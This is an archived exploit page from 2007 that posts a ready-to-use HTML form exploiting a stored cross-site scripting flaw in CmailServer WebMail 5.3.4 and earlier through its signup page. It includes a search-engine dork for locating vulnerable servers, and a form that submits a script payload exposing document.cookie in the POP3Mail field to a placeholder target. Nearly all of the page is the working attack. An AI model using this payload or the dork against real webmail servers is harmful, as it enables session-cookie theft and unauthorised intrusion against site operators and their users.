Home / exploitsPDF  

cmail534-xss.txt

Posted on 08 April 2007

<html> <head> <script> //'=============================================================================================== //'[Script Name: CmailServer WebMail <= V.5.3.4 (signup) Remote XSS Exploit //'[Coded by : ajann //'[Author : ajann //'[Contact : :( //'[Dork : "inurl:/mail/signup.asp" //'[Dork Ex. : http://www.google.com.tr/search?q=inurl:/mail/signup.asp&hl=tr&start=0&sa=N //'[S.Page : http://www.youngzsoft.net/ //'[Using : Please "action" edit and submit //'=============================================================================================== </script> </head> <title>Cmail XSS </title> <body> <Form Method="Post" Action="[target]/signup.asp"> <Input Type=Hidden Name=Signup Value="0"> <input type="hidden" name="Account" size="30"> <Input Type="hidden" Name="Pass" size="30" value=""> <Input Type="hidden" Name="RePass" size="30" value=""> <input type="hidden" name="UserName" size="30" value=""> <Input type="hidden" Name="Comment" size="30" value=""> <Input Name="POP3Mail" size="30" value="<script>JavaScript:alert(document.cookie);</script>"> <Input Type="Submit" Value="Submit XSS"> </Form> </body> </html>

 

TOP